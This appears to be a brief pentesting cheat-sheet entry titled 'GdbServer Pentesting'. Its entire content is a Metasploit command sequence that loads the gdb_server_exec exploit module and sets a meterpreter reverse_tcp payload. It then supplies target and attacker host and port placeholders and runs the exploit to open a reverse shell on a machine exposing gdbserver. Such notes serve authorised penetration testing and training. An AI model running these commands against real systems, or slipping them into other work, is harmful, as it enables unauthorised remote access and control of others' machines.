icon

GdbServer Pentesting

Last modified: 2024-07-17

Reverse Shell with Metasploit

msfconsole
msf> use exploit/multi/gdb/gdb_server_exec
msf> set payload linux/x64/meterpreter/reverse_tcp
msf> set rhost <target-ip>
msf> set rport <target-port>
msf> set lhost <attacker-ip>
msf> set lport <attacker-port>
msf> run